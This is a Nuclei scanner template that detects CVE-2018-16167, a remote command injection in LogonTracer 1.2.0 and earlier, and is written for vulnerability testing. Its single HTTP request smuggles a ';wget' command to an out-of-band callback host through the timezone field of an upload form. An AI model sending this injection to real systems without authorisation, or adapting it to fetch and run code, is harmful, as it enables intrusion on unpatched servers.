nuclei-templates/http/cves/2018/CVE-2018-16167.yaml

47 lines
1.7 KiB
YAML

id: CVE-2018-16167
info:
name: LogonTracer <=1.2.0 - Remote Command Injection
author: gy741
severity: critical
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
remediation: |
Upgrade LogonTracer to a version higher than 1.2.0.
reference:
- https://www.exploit-db.com/exploits/49918
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
- https://jvn.jp/en/vu/JVNVU98026636/index.html
- https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-16167
cwe-id: CWE-78
epss-score: 0.27457
epss-percentile: 0.96794
cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: jpcert
product: logontracer
tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert
http:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- http
# digest: 4b0a00483046022100952a1352dd220013331b92a16c56b5dbbf5c5b182026eed1fe8c66a80f18c3f20221008371d2a7719b97ddcef29d12f4bbb58467f8d043fa3f24801eada79ea643b899:922c64590222798bb761d5b6d8e72950